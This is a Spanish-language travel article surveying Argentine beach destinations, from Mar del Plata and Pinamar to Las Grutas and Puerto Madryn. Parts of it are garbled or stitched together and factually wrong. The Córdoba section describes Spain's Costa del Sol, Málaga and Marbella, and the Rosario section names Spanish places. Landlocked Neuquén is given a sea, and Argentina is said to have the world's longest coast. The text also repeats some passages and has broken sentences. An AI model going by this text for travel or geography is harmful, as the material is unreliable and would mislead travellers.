Categorías
Generalidades del país

Playas de Argentina: Buenos Aires, Costa Atlántica, Córdoba, Rosario y más

Estar inmersa en una playas cuyas costas son bastante atractivas la Playas de Argentina, son especiales y con un clima bastante templado hace que sus costas y mares sean frías por su cercanía a la Antártida.

Playas de Argentina

Las mejores Playas de Argentina.

Argentina puede ser mejor conocida por su carne y vino tinto, pero su costa de 3,100 millas también atrae a los visitantes a su amplia gama de atracciones en la playa. Elija entre las remotas reservas costeras de la Patagonia o los tranquilos resorts del Atlántico en la activa ciudad de Mar del Plata.

Bueno, si sabes de antemano que no encontrarás nada como el Caribe o el mar Mediterráneo, puede que haya algo para ti aquí. Las playas argentinas son generalmente más frías que las playas más populares del mundo, pero de todos modos, se llenan en verano y algunos lugares tienen más que ofrecer que solo la playa.

Mar de Plata es una de Las Playas zonas más concurridas que se encuentra en la zona atlántica por todas las opciones que se ofrecen a sus visitantes en cuanto a entretenimientos y diversión. , durante el cálido verano. Aparte de sus espectaculares balnearios muy provistos de muchas comodidades y diversión a todos los visitantes en la época del año que es de un cálido verano. En esta ciudad balneario se encuentran muchas playas para pleno disfrute, como lo es una de las mas populares Playa Bristol, que se encuentra en una zona céntrica de la ciudad y una de las más visitadas. (ver articulo: La Rioja)

Aquellos que viajen a Argentina durante los meses más cálidos de noviembre a marzo deberían considerar incluir algunos días en la playa. Hay algunos buenos lugares para refrescarse del calor del verano y sumergirse en la cultura navideña argentina. Desde resorts de playa urbanizados y llenos de acción hasta pintorescas pasarelas orientadas a la familia, hay una playa en Argentina que se adapta a todos los gustos.

Playas-de-Argentina-1

A lo largo de dicha zona también se encuentran otras playas muy exclusivas como lo son Punta Mogote y las de Bosque Peralta Ram.

Para visitar las playas de Argentina, recuerde que las estaciones se invierten en el hemisferio sur; el verano es de diciembre a febrero, mientras que el invierno es de julio a septiembre. La mejor época del año para visitar depende de a dónde va, qué quiere hacer y si desea evitar las aglomeraciones.

Otra de las mejores playas de Argentina son las que se encuentran en la Ciudad balneario Pinamar, ya que cuenta con unas playas muy extensas y de hermosas arenas blancas, también ofrece diferentes actividades deportivas como lo es el Surf por su fuerte oleaje. Cuenta con paradero para los familiares y amigos asi como también excelentes centros gastronómicos, centros para realizar sus respectivas compras y una vida nocturna muy concurrida que es lo que hace, que los jóvenes lo tengan como el mejor sitio para sus vacaciones de verano.

Puede elegir una gran ciudad como Mar del Plata (grande, abarrotada, con su propia población y vida todo el año) o ciudades más pequeñas como Miramar (familiar, agradable, muchos niños, bicicletas, etc.) o centros turísticos más nuevos creados para atender a la clase media alta como Cariló o Mar de las Pampas.

Estas últimas son maderas artificiales, creadas por la mano del hombre, en medio de las dunas y junto al mar, con un diseño de paisaje muy agradable y casas privadas que parecen competir en opulencia y riqueza. Allí, también encontrarás muchos hoteles, apartamentos y casas de alquiler

Las Playas de la Ciudad Miramar de Argentina es una de las zonas también muy concurridas que se encuentran en el Norte que son más tranquilas y el Centro de la ciudad, se realizan muchas actividades deportivas como el Surf  por el fuerte oleaje que presenta. (ver articulo: El Calafate Argentina)

San Clemente de Tuyu es otro de las ciudades balnearios en las que se encuentran playas muy tranquilas, y un clima muy cálido excelente para el descanso y disfrute de los temporadistas, asi como también cuenta con una gama de exclusivas Agua Termales saladas y en lo que los temporadistas realizan en dicha zona un tiempo de relax.

Mar de las Pampas es un balneario que está destinado para el descanso y relax de las personas que allí concurren, por su tranquilidad y suave oleaje. Cuenta con grandes espacios de áreas verdes y solitarios.

Otras de las playas que se encuentran entre la lista de las mejores son: Cosumel, Chao Montesco, Divisadero y Hemingway.

Eso depende de lo que estás buscando. Pinamar y Villa Gesell (Buenos Aires) son los que mejor cumplen con los requisitos de los jóvenes. Mar del Plata (Buenos Aires) es para la familia, pero es una ciudad grande y abarrotada. Si tienes algo de dinero extra para gastar, Cariló (Buenos Aires) es hermoso, muy tranquilo, playas bonitas pero caras. Las playas en el sur de Argentina son más frías, a excepción de Las Grutas (Río Negro) que son más cálidas de lo que se puede esperar debido a sus coordenadas.

El mes más frío, en promedio, es julio, a 57 grados, y el mes más lluvioso es marzo. Las playas de la Patagonia se vuelven muy frías en invierno, con un promedio bajo de 37 grados F en julio, mientras que las temperaturas de verano son agradables, con un máximo de 68 grados F. Puede ser ventoso en primavera en la Patagonia, pero también es uno de los mejores momentos para evitar las multitudes.

Lo necesario es tener la disponibilidad y el tiempo para visitar las diferentes Playas de Argentina la cual se pueden percibir y poder disfrutar en diferentes épocas del año, estos indicando las estaciones, e incluso podemos decir que hay grupo de personas que se sumergen en sus aguas frías, pero también puedes disfrutar de sus ríos qu son convertidos en balnearios para el disfrute de grande y chicos.

Playas de Buenos Aires

Para las vacaciones familiares, las playas del norte de Partido de la Costa, las más cercanas a BA, son un poco favoritas. Con atracciones como Sea World, un parque acuático, y precios más bajos que en otras áreas a lo largo de la costa, tiene un ambiente relajado pero con muchas cosas que hacer. El Partido de la Costa se extiende desde San Clemente del Tuyú hasta Costa Esmeralda, y tiene una variedad de ciudades más grandes y balnearios más pequeños.

Para aquellos que buscan una acción de la ciudad para ir con sus playas, la opción obvia es Mar del Plata. Teniendo en cuenta que aproximadamente la mitad de la población total de BA se traslada a ‘Mardel’ en verano, caminar por la ciudad se siente como caminar a lo largo de la Av. Corrientes en la hora pico, pero con el océano cerca. Las pequeñas playas de la ciudad se llenan increíblemente, pero si quieres vida nocturna, teatro, observar a la gente, o jugar con el dinero de tu alojamiento en el icónico casino, este es el lugar para estar.

Hay, por supuesto, opciones menos intensas. Villa Gesell es una de las ciudades más grandes de la costa, y es conocida por su «ambiente juvenil». Si bien no es la ciudad más atractiva, sí tiene playas grandes y anchas y fácil acceso a centros turísticos más pequeños y más agradables como Mar de las Pampas, Las Gaviotas y Mar Azul.

A medida que Buenos Aires cambia gradualmente de una colorida metrópolis primaveral a un sofocante horno de verano, lo más apropiado es unirse al éxodo masivo porteño y dirigirse hacia la costa. Pero antes de cambiar 9 de Julio por una vista del mar, lea esta guía para encontrar el lugar de playa adecuado para usted. Tenga en cuenta que la gran mayoría de los argentinos viajan en enero y febrero, cuando los precios de alojamiento son más altos y las playas más concurridas

Las Playas en Buenos Aires son las mas visitadas no solo en el verano sino en todas las épocas del año, ya que cuenta con un servicio de Hoteleria de primera. Desde San Clemente del Tuyu donde el Rio de la Plata se une con el mar donde se pueden apreciar como se combinan las playas con  medanos y bosques que se encadenan entre si. En pequeñas localidades. (ver articulo: Caleta Olivia)

Estas se convierten en playas bastante concurridas por ser la capital del país sudamericano que cuenta con una extensión en cuanto a sus playas bastante alargada, convirtiendo en Argentina el País mas largo del mundo, en cuanto a sus costas son bastante variadas y en Buenos Aires, se puede apreciar una de las menos frías y calidas en alguna epoca del año.

Playas-de-Argentina-2

Playas de Córdoba.

Las playas mas cercanas a Córdoba son la costa del sol que esta a poca distancia y la Playa málaga que esta a hora y media en coche, también se puede ir en tren y se tarda como menos de una hora, es muy habitual visitar Córdoba durante los fines de semana para el disfrute de las playas que le quedan cerca de la costa y asi poder disfrutar también las zonas turísticas como lo son: Terremolinos, Marbella y Benalmadena.

Playas-de-Argentina-3

Las lindas playas y la excelente gastronomía de la costa es lo que hace de Córdoba un lugar exquisito para el pleno disfrute de la familia en la época de vacaciones.

Playas de Rosario.

Conocer las playas de Rosario se hace de una forma muy sencilla por las vías de comunicación que tienes para poder acceder a ellas, ya sea por vía de tren, en carreteras y cualquier otro medio de transporte el cual indica de forma fácil su acceso y poder disfrutar de las mejores playas de estas provincias. ( ver articulo: Ciudad de Salta)

Obteniendo diferentes sitios en la cual puedes disfrutar de sus playas tanto en el día como en la noche cuentas con diferentes sitios de alojamiento que te prestan los servicios necesarios en tu estadía, cómodas y confortables sitios de habitación para disfrutar al máximo sus cálidas playas.

En ellas podrás conseguir playas como las que podemos mencionar, banco de arena, florida, costa alta, la rambla catalunya, entre estas playas unas debes contar con diferentes cantidades de pesos para su acceso, pero también cuentas con playas de acceso libre y que puedes disfrutar sanamente y con toda la familia en cualquier día de la semana, si visitas estas playas recuerda llevar tu bloqueador solar, ya que sus visitas deben ser en verano.

Puedes disfrutar de todos sus atractivos en un sano esparcimiento y siempre manteniendo el orden en lo que realices y tratar en lo menos posible como mensaje de contaminar las playas y llevar tus desperdicios, asi mantenemos nuestras playas y le damos mucha más vida a nuestro planeta.

Playas de la Plata.

Llamada también la Perla del Atlántico estas playas son muy extensas y variadas se encuentran playas de todos tipos, pequeñas, extensas, para pescadores de todo tipo, es un lugar donde siempre está presente el disfrute de toda la familia, también se encuentran muchos tipos de centros gastronómicos desde los más económicos hasta los más caros, asi como también los diversos hoteles desde los más simple hasta los más lujosos. (ver articulo: San Rafael Argentina)

No es exactamente un destino tranquilo, así que considere ir a otro lado si la paz es el objetivo principal. Muchas actividades como el buceo, el golf, la pesca y la vela ayudan a compensar a las multitudes.

La mejor época del año para visitar Mar del Plata y las playas de la costa atlántica, en términos de clima, es en diciembre y enero. En este momento, la temperatura es un máximo promedio de 77 grados F.

Playas-de-Argentina-4

Es un lugar donde se puede disfrutar a plenitud para todos los gustos.

El complejo de playa original y más animado de Argentina es conocido en todo el país por las hordas que se congregan aquí a medida que el mercurio comienza a dispararse. Todos los veranos, grandes multitudes de turistas internacionales y locales descienden a las arenas de Mar del Plata para tomar el sol, antes de ir a un sinfín de bares y restaurantes elegantes al caer la noche.

Playas de Santa Cruz.

Contamos con diferentes sitios que los catalogamos como playas aptas para el disfrute familiar en Santa Cruz, lo cual podemos indicar a cada una de ellas en sus diferentes detalles para que elijas cual es la mas propicia y que genera mas expectativas para visitar ya sea en tu grupo de amistades y tu grupo familiar.

Playa Alsina: con una dimensión de 3.3370 metros lo cual indica que mas de 3 kilómetros de blanca arena aguas cristalinas y un sin fin de sitios que serán de tu agrado para recrearte, como las mas visitadas como la rada tilly, Comodoro Rivadavia y Caleta Oliva, estas en horas nocturnas son bastante visitadas por sus vistas y espectacular belleza en sus noches de verano y primavera. (ver articulo: Catamarca Argentina)

Playa Las Golondrinas: Se debe estar atentos a los diferentes anuncios los cuales indican si están aptas para bañarse y poder estar un día de tranquilidad, contando con 4.500 metros dan la posibilidad en sus diferentes playas que la conforman poder disfrutar de manera sana en estas playas, donde felizmente un fin de semana estas playas pueden obtener la visita de mas de 3.000 visitantes.

Playas-de-Argentina-5

Playa Bonita: entre los limites de las provincias de Chubut y Santa Cruz, se puede apreciar esta playa como su nombre lo indica Bonita, bella arena fina conforman 4.170 metros de estas ricas aguas y espectacular belleza en su recorrido, acogiendo diferentes sitios donde poder obtener una posada y una tranquilidad en el recorrido de su playa.

Playa la Tranquera: son 560 metros de playas no tan tranquilas lo cual hace que los visitantes deben tener mucho abrigo para poder desplazarse de manera segura, por sus vientos y en muchas ocasiones marejadas, esta integrada por 7 playas de arena fina pero que deben ser tomadas con mucha precaución en su visita.

Playa Mar de ajo.

Es un centro de la Costa muy Turístico y relevante con un gran ambiente familiar, esta ubicada en al Atlántico y unida a San Bernardo este Mar de Ajo tiene un clima templado muy agradable y durante muchos años fue conocida como playa la Margarita en Homenaje a unas embarcación que Naufrago allí. Mar de Ajo ofrece varios kilómetros de costa donde las almejas y otros mariscos la invaden, el muelle de pesca tiene una estructura de 270mts de longitudes el mas grande de la costa ideal para disfrutar una jornada de pesca.

Playas-de-Argentina-6

Hacia el sur del Mar de Ajo se encuentran los medanos donde se realizan paseos a caballos y de cuatriciclo. En la noche el Mar de ajo cuenta con unas excelentes instalaciones de Casino, donde hay juegos de ruleta,black yack y también cuenta con unas muy modernas maquinas electrónicas. También hay un excelente autódromo para los amantes del automovilismo. Realmente estas playas contienen todo para el esparcimiento y recreación en familia.

Playas verde.

Estas playas se encuentran situadas a 355 km de la Capital Federal, guarda similitud geográfica con los diversos balnearios, es un sitio ideal para los que quieren tener sus residencias y llevar una vida tranquila frente al mar y también para los amantes del camping, por su extensa vegetación que ofrece.

Este punto a lo largo de los años se ha convertido en una hermosa villa turística. Su característica principal es su tranquilidad y sencillez. Su actual vegetación cuenta con un bosque de pinos marítimos, que forma parte de los paseos tradicionales

Playas de Nueva Atlantis.

Las Playas de Nueva Atlantis se encuentran hoy en día en su plena y comprometida apertura, aunque cuenta con amplias y bellas playas se indica que son ideales para la practica de diferentes actividades deportivas que incluye la playa, en las mismas no evidencias el recorrido de muchas personas en visita, las mismas cuentan con pocos sitios de diversión y esparcimiento lo cual hace que sea su visita solo conocer.

Playas-de-Argentina-7

Esto hace que todo se vea de manera que el visitante este en completa armonía con la naturaleza, ya que sus espacios y en la forma en que se encuentran sus playas pone en evidencia que es solo para visitar y relajarse de manera muy efectiva. (ver articulo: San Juan Argentina)

Playas de Neuquen

Neuquen cuenta con unas playas que las mismas pueden ser visitadas y de manera que usted y cada uno de los integrantes de su familia pasen un día ideal rodeado de un inmenso mar y complejas formaciones que han llevado sus espectaculares belleza.

Playa Mala: de origen volcánico hace que sus orillas y dentro de las mismas estén formadas por cenizas volcánicas, ya que su formación se debe a un volcán adyacente. Ideal para la realización de los camping en unión familiar y muy propicia para su caminar.

Playa Mansa: la puedes visitar cuando no es muy concurrida en los meses de abril, ideal para realizar diferentes caminatas con su vegetación y disfrute familiar.

Playa Catritre: Cuando deseas volver a un sitio este es el principal, es encantadora la cual te hacen sentir en un sitio de paz.

Playa Mansa: esta playa es muy relajante solo que se recomienda es sentarte o acostarte en sus arenas y observar la inmensidad del mar y la vista de su horizonte, cuenta con un hotel el cual se encuentra en la parte delantera.

Playa Quila: puedes trasladarte desde barco para llegar a la playa, en el lago puedes disfrutar de diferentes actividades deportivas que hacen del deportista todo el derroche de sus aptitudes y disfrute de todo el grupo familiar en su esparcimiento sano. (ver articulo: La Pampa Argentina)

Playas de Río Negro.

Si hacemos un recorrido por las playas de Río Negro nos conseguimos con playas mas oceánicas, estas hacen que se tenga un poco mas de cuidado y a su vez de preservarlas con mayor atención.

Las Grutas: como su mismo nombre lo indica podemos encontrar en ella diferentes grutas, sus aguas aunque están a nivel oceánica son un poco mas cálidas, debido a el choque de las aguas, cuando la marea baja puedes ver diferentes moluscos y pulpos acercarse y tener visión de manera fácil.

Mucho más abajo en las costas del Atlántico se encuentra la ciudad relajada de Las Grutas. Casi inaudito hasta hace poco, se está convirtiendo en un popular destino de playa para los que lo conocen. Las playas tienen arena más blanca y aguas más cálidas que sus homólogas del norte, atributos que muchos creen que lo hacen digno de recorrer una distancia extra

Las Grutas se encuentra más al sur, en la costa atlántica de Argentina, en la Patagonia. Es un poco menos conocido, sin embargo, sin duda se está convirtiendo en uno de los mejores lugares de vacaciones en la playa en Argentina debido a su ubicación virgen.

Si prefiere una escapada más tranquila, a una costa virgen, entonces Las Grutas es la playa para usted. A diferencia de la costa más cercana a Buenos Aires, las playas acantiladas de la provincia de Río Negro en la Patagonia atraen a un tipo diferente de gente.

Playas-de-Argentina-8

Bahía Lopez: en ella puedes apreciar el volar de las aves, y la belleza de su lago, ideal para poder compartir en familia y disfrutar de sus aguas mansas, en ella puedes conseguir diferentes comodidades y si te acercas con un barco propio puedes ver en privado su inmensidad.

Tamarisco: Ideal para disfrutar la tranquilidad y te hará sentir que todavía te hace falta algo por terminar por poder disfrutar su atardecer y su paz que te va a enrredar.

Playas Dorada.

Cuenta con 30 kilómetros de extensas playas la cual hace el sitio ideal para visitar y concentrarse, mantener un sitio guardado en su bellas playas, su nombre se debe a los rayos del sol lo cual hacen ver toda la playa en un color dorado bello en su resplandor.

Cuenta con todos los servicios necesarios para su visita, en ella puedes disfrutar de sus aguas, en la recreación de cualquier actividad deportiva acuática como el buceo, la pesca el surf y un sin fin de actividades que harán sentir con el dominio de tus destrezas y habilidades acuáticas.

Playas-de-Argentina-9

Un sitio inolvidable la cual se encuentra ubicada en la Provincia de Río Negro, recuerda 30 kilómetros de playas cada una de ella con su encanto y belleza natural. En ella también vas a conseguir las playas La Isla, Bonita, Los Suecos, Las Casitas entre otras.

Playas de Viedma.

Cuando le encanta el sol y la playa este sitio es potencial para ti, puedes visitar sus playas y balnearios lo cual son muy acogedores y te brindan lo que buscas en una playa ideal, una aguas cálidas y que puedes disfrutar al máximo con toda la familia e incluso solo o sola, aquí tendrás todos los servicios necesarios para tu estadía sea agradable y que puedas volver a visitar, los que realicen el recorrido por Viedma pueden regresar a sus playas.

El cóndor: El comienzo de sus acantilados, el sol y la arena hace el resto, bella playa la cual puedes disfrutar de su agua o en practicar cualquier deporte, puedes recrearte un día y al finalizar desde el mirador ver el atardecer que te brinda a la vista un espectáculo que recordaras.

Playas-de-Argentina-10

La Lobería: el conjunto de estas playas hacen que bañarte en pilas naturales sea tu experiencia mas envidiable en esta playa esto ocurre cuando la marea baja y socavan las grutas y resplandece el agua para que sea disfrutada por ti como visitante, cuenta con diferentes sitios en la cual hace que puedas descansar y dejar en tranquilidad su auto, y cuentas con un transporte ideal para bajar los acantilados como lo es el cablecarril.

Bahía Creek: si tu disfrute es tomar el sol esta playa es la ideal para ti, en esta playa debes tener precaución a la hora de tomar el sol ya que la misma no cuenta con ningún sitio donde protegerte de el, pero sus aguas son inmensas y bellas

Playas de Chubut.

Existen diferentes playas en la cual puedes o realizar cualquier actividad deportiva, como el bañarte si te animas ya que sus aguas son bastante frías, muchos lo hacen pero ideal para esparcimiento un día cálido con la familia y realizar cualquier actividad en sus aguas, o simplemente tomar el sol cuando este de tu lado.

En Chubut puedes encontrar la playa Puerto Madryn, El doralillo, Rawson y Playa Union, cada una de ella con su singular belleza particular y sus aguas esperando a que vaya a visitar.

Playas de Puerto Madryn.

El doradillo Cientos de turistas se sientan día tras día mirando las ballenas. Debido a su potencial ecológico y turístico, se decidió convertirlo en Área Protegida para realizar las acciones apropiadas para conservar la naturaleza. Por lo tanto, en el año 2001 se estableció como «Paisaje y paisaje marino protegidos» por la Ordenanza Municipal N ° 4263/01, y en 2003 se elaboró ​​el Plan de Gestión y Desarrollo del Área Protegida El Doradillo.

Gracias a la apariencia de la costa es posible observar cetáceos a solo unos metros de distancia, poder admirar la grandeza de sí mismos, sus movimientos, las típicas bocanadas en forma de V cuando respiran, los golpes de aleta y cola y las madres están navegando con sus terneros paralelos a la costa.

El Doradillo es también un sitio ideal para diversas actividades deportivas y recreativas, como trekking, ciclismo de montaña, fotografía de naturaleza y observación de aves.

Otra ventaja importante es el simple viaje de tres horas a Puerto Madryn, el principal parque natural de la Patagonia, que cuenta con una gran variedad de animados elefantes marinos, leones marinos y pingüinos.

Playas de Entre Ríos.

Como en todas las provincias de Argentina contamos con innumerables costas de playas y balnearios que son acogedores y de uso familiar y deportivo, las playas Entre Ríos son de una belleza sin igual y que sirven de igual manera para la practica deportiva acuática.

Sin embargo se enumeran sus playas las cuales de acuerdo a tus gustos puedes visitar y sentirte ameno con su turismo ya sea interno como externos, se invita a todos a que visiten esta lindas playas y recorrer en todo su esplendor para asi sentir que has conocido un territorio sin igual, en unión de la familia y si lo acojes para tu luna de miel, cuentas con todos los servicios necesarios en sus balnearios.

Donde incluye grandes edificaciones de hoteles, posadas, restaurantes y tiendas los cuales te harán sentir como en casa y sin ningún tipo de perturbación, con una tranquilidad que podrás relajarte mucho mas.

Playas de Marisol.

El balneario Marisol emerge como una nueva atracción turística ya que el pueblo veraniego conocido como Oriente desaparece lentamente en medio de las colinas de arena. Se encuentra en la costa atlántica argentina y es parte del distrito de Coronel Dorrego. Como resultado de sus características naturales, incluido el mar abierto y sus olas agitadas, su infraestructura urbana ha evolucionado año tras año.

Las orillas del río Quemado Salado llegan a la costa y forman una de las fronteras de la ciudad. El agua dulce y salada se mezcla en su desembocadura, creando así un hábitat adecuado para la pesca variada. Por lo tanto, capturar buenos ejemplares de ríos y mares es una de las mayores motivaciones para los pescadores. Solo necesitan obtener información sobre las estaciones y el equipo que deberían usar para capturar las mejores piezas.

En el verano, Marisol, que significa «mar y sol» , está activo durante el día, cuando estas dos fuerzas de la naturaleza son las protagonistas. También existe la posibilidad de disfrutar de excursiones en las llanuras y acantilados rebosantes de belleza y misterio en el interior de Buenos Aires. Mulpunleufú Cascade, la cueva conocida como Cueva del Tigre y Puente Viejo son algunos de los lugares más tradicionales.

Además de los lugares de alojamiento, acampar en un bosque muy acogedor y lugares gastronómicos, el pueblo ofrece los servicios esenciales para una estancia tranquila.

No hay vida nocturna y cuando los jóvenes desean ir a bailar o visitar algún bar, eligen viajar a la cercana ciudad de Oriente, que se encuentra a 22 kilómetros de la costa.

Marisol atrae a los turistas de las áreas circundantes, así como a los que visitaron este lugar una vez y resuelven no irse. Amanecer y anochecer en la misma playa donde todos los días sale y se pone el sol mientras la gente disfruta de paseos, contemplación y sensibilidad por lo que la naturaleza tiene para ofrecer.

Playas de Bahía Blanca.

Estas playas de bahía blanca se encuentra ubicada al sur de la costa atlántica,en la Provincia de Buenos aires, donde el rio Plata se une con el mar y se pueden apreciar hermosos bosque y medanos con pequeñas localidades a todo su alrededor, cada una con diferentes peculiaridades.

Si eres más un viajero de aventura seguramente no puedes equivocarte con esta playa. Pehuén Có es la mejor playa natural de Argentina y es poco probable que encuentres turistas, edificios o cualquier otra cosa que no sean costas arenosas. Situada a 84 km al este del importante puerto de Bahía Blanca, esta parte de la costa argentina es ideal para los intrépidos viajeros que buscan una experiencia de playa sin lujos.

Playas-de-Argentina-11

Playas del Sur.

Estas playas se encuentran al Sur de la Costa Atlántida en la ciudad de Buenos Aires de la provincia de Argentina, en toda la costa sur del mar Argentino. Entre dichas playas no existen grandes distancias entre las localidades, estas playas son y serán siempre uno de los destinos mas elegidos por los visitantes tanto Nacional como Internacional.

Playas de Agua Cristalinas.

Argentina tiene una costa atlántica larga y accidentada con amplias playas de arena. Al sur de Buenos Aires hay varias ciudades de playa que ofrecen alojamiento y actividades junto al océano

Playas-de-Argentina-12

En la Patagonia existe un estilo diferente de vida en la playa junto a los lagos de agua dulce más grandes cerca de San Martín de Los Andes y Bariloche, que tienen las ventajas de algunos paisajes increíbles y una gran cantidad de actividades

Playas de Costa Atlántica.

Comenzando en San Clemente del Tuyú, donde el Río de la Plata se une al mar, hasta los distritos marinos que se suceden al sur de Bahía Blanca, se puede apreciar un paisaje donde las playas, colinas de arena y bosques se combinan con pequeños pueblos. Cada uno de ellos tiene sus rasgos particulares.

Ciudades clásicas como San Bernardo, Pinamar, Valeria del Mar, Villa Gesell y Mar del Plata son elegidas por los jóvenes para planificar sus vacaciones de verano. Su vida nocturna y actividades de vanguardia captan la atención de los visitantes que buscan adrenalina todo el tiempo. Y asi poder disfrutar de sus excelentes playas. Aunque con la condición de poder tomar la iniciativa por sus frías aguas.

Sin embargo, otros sitios invitan a los viajeros a relajarse y olvidarse del mundo en sus spas, cabañas y centros turísticos. Los destinos favoritos entre parejas y familias son Mar de las Pampas, Las Gaviotas y Cariló, pero la lista es interminable y otros destinos como Claromecó, Monte Hermoso, Mar Azul o Reta se están convirtiendo en parte de ella, ya que ofrecen más posibilidades recreativas para disfrutar.

Playas-de-Argentina-13

Mirar un mapa de la costa atlántica nos ayudará a darnos cuenta de que prácticamente no hay distancia entre un distrito y otro. La aparición de los nuevos asentamientos costeros evidencia que la playa fue, es y continuará siendo uno de los destinos turísticos más populares de Argentina.

Situado cerca de Villa la Angostura en el Distrito de los Lagos Patagónicos, el agua aquí es bastante fría. Sin embargo, esta encantadora playa junto al lago ofrece el respiro perfecto después de un largo día de excursión a través de la impresionante naturaleza patagónica. Aquellos que prefieren evitar el agua fría pueden optar por un kayak en su lugar o simplemente descansar en la arena con los otros turistas locales

Playas de Necochea.

Esta es una ciudad balnearia ideal para el descanso y el disfrute de las personas que la visitan, sus playas son muy amplias aunque en un tiempo tuvo mala fama por ser unas playas con mucho viento, cuenta con uno excelente espacio de hoteles, tiendas, restaurantes, paseos, bingos, casinos. Cuenta con todo lo de una Ciudad pero en la tranquilidad, es decir sin el bullicio de las ciudades. También se descubrieron aguas termales donde se colocó un spa para el gran disfrute de todos los que requieran un rato de relax.

Playas-de-Argentina-14

Playas de Nudismo.

Esta playa se encuentra situada también en la Costa Atlántica de la Provincia de Argentina, donde los turistas de estas playas escogen para relajarse y pasar unas vacaciones de verano, es un lugar muy acogedor donde ofrecen una gama de hoteles y restaurantes con una gastronomía de primera calidad.

Playas-de-Argentina-15

Playas de Costa Azul.

Estas son las playas muy concurridas por los visitantes, se encuentran en la Costa Sur de la Provincia de Argentina, donde los turistas escogen dichas playas para relajarse y tener un poco de tranquilidad y esparcimiento durante sus vacaciones de verano, donde el clima y el viento favorece mucho. También ofrece excelente gastronomía y hoteles de primera calidad.

Playas de Pinamar.

Un poco más al norte y mucho menos popular que Mar del Plata, Pinamar es una buena opción de vacaciones familiares por su baja densidad de población y playas tranquilas, bordeadas por espesos bosques de pinos. La ciudad es bastante lujosa, muy popular entre los turistas adinerados de Buenos Aires que alquilan espaciosas casas con frondosos jardines que se abren a la calle.

Son unas playas muy extensas y de hermosas arenas blancas, también ofrece diferentes actividades deportivas como lo es el Surf por su fuerte oleaje. Cuenta con paradero para los familiares y amigos asi como también excelentes centros gastronómicos, centros para realizar sus respectivas compras y una vida nocturna muy concurrida que es lo que hace, que los jóvenes lo tengan como el mejor sitio para sus vacaciones de verano

Playas de Ostende.

La primera atracción marcada por los mapas es la antigua explanada o explanada sur, en la calle Nuestras Malvinas y la playa. Construido en 1912, fue cubierto más tarde por arena. Se dice que una pequeña cafetería se abrió allí en la década de 1930. Fue recuperado en 1993. Hubo un proyecto para transformarlo en un paseo marítimo similar a la explanada de Mar del Plata en la actualidad. Se construyeron locales pequeños en los fondos que fueron utilizados por los nadadores como vestuarios. Pero solo se cumplió una parte del proyecto.

Playas-de-Argentina-16

Playas de Miramar.

Las playas de esta ciudad de Argentina son muy concurridas por los Turistas ya que posee unos atractivos naturales muy hermosos como lo son la extensa vista a la vegetación, estas playas se encuentran divididas en dos grandes balnearios.

Justo al sur de Mar del Plata, Miramar es una buena opción para unas vacaciones en familia más informales, asequibles y relajantes. Los precios son razonables, el área es hermosa y las playas son generalmente tranquilas, lo que es ideal para niños pequeños. También es un popular destino de ciclismo con una serie de senderos escénicos paralelos a la playa

Playas-de-Argentina-17

La zona del norte por ser de aguas muy tranquilas y la zona del centro que son  también muy concurridas por su cercanía a la ciudad y sus diferentes actividades deportivas que se realizan allí como lo es el Surf, que es uno de los deportes mas predominantes en la zona por su gran oleaje que se presenta.

Playas de Santa Teresita.

Esta ciudad turística es elegida por muchos turistas para el disfrute en familia, se encuentra situada a 310 km de la Capital Federal, limita al norte con la localidad de las toninas al sur con el mar del tuyu, esta región costera es un lugar tradicional para veranear tiene un clima muy cálido en el verano que oscila entre los 21 y 33 grados centrigrados.

Playas-de-Argentina-18

Los visitantes cuentan con extensas playas donde se puede disfrutar las bondades del mar, sol. Arena, asi como también caminatas, cabalgatas, paseos en cuatriciclo, asi como ta,bien en el agua disfrutando de paseos acuáticos, natación y esquí entre otros.

Playas de San Bernardo.

Estas playas se encuentran  situadas sobre el litoral marítimo boranese, en la ciudad de San Bernardo, se encuentra a 325 km de Buenos Aires, presenta playas angostas donde miles de turistas se dan sita en ese lugar para el disfrute de los días de verano el clima de San Bernardo es muy cálido oscila con una temperatura desde los 22 y 33 grados centígrados.

Este sitio esta compuesto por pintorescas construcciones rodeadas de muchos Arboles antiguos que dan testimonio a los años de San Bernardo, cuenta con una calle peatonal que es un paso obligado después de una jornada de playa donde hay muchos comercios para el disfrute de los temporadistas o visitantes de este hermoso lugar.

Playas de Mar de Tuyu.

Es una de las playas que se encuentran ubicadas en la Costa Atlántica que se encuentra en la provincia de Buenos Aires donde atrae con sus cálidos veranos muchos visitantes, con servicios turísticos y hostelerías de primer nivel, donde el mar se une con el Rio de la Plata. En este lugar se encuentra el mayor Oceanario mas grande de América del sur,el cual ofrece uno de los atractivos marinos que permite conocer diferentes formas de vida marina como lo son las focas, los delfines, las Orcas, los lobos y los pingüinos.

Playas-de-Argentina-19

Ademas de todas las actividades náuticas como lo son los Winsurf, Jet, Esqui o paseos en embarcaciones. Es un verdadero paraíso para disfrutar con toda la familia.

Más al norte de Mar del Plata, entre la ciudad y Buenos Aires, los visitantes encontrarán playas y pueblos más pequeños que atraen principalmente a visitantes argentinos. Pinamar, rodeado de bosques de pinos, y Villa Gesell son los más grandes de los pueblos de playa, con Cariló y Mar de las Pampas, los satélites más pequeños.

Visitar en el invierno significa alojamiento limitado y opciones de restaurantes, y la temperatura del océano desciende a 48 grados F. El verano, cuando llega la mayoría de los visitantes, las temperaturas de la tierra de 77 grados F.

Playas de Carilo.

Justo al lado de Pinamar, Carilo es donde las cosas empiezan a ser realmente exclusivas. Disfruta de las mismas playas agradables y bosques de pinos que Pinamar, pero atiende completamente a la élite financiera impecablemente vestida del país. En esta moderna ciudad se pueden encontrar numerosas boutiques, restaurantes y spas elegantes. Considere quedarse aquí solo si el presupuesto lo permite.

Carilo se encuentra justo al lado de Pinamar, y con sus pintorescas cabañas de bosque y playas bellamente mantenidas, unas vacaciones aquí son una delicia que no es barata. Sin embargo, si lo que busca es lujo, una estancia en Cariló, codeándose con la élite argentina, podría ser lo que está buscando.

El cercano Miramar, por otro lado, es mucho más sensato y silencioso. Esta bonita ciudad es un popular destino de ciclismo en Argentina y es una buena opción para familias, ya que está bien facilitada, es tranquila, atractiva y segura.

Es uno de los centros balnearios más exclusivos de Argentina y cuenta con unas playas muy hermosas, ya que se encuentra bordeado por un inmenso bosque, también cuenta con extensas dunas y médanos que hacen de este lugar un exclusivo y atractivo turístico para los temporadistas que buscan pasar días sus, de veranos tranquilos y relajantes.

Playas-de-Argentina-20

 

Y cuenta con cuatro espectaculares Playas como lo son: Cosumel, Chao Montesco, Divisadero y Hemingway.

Playas de San Luis.

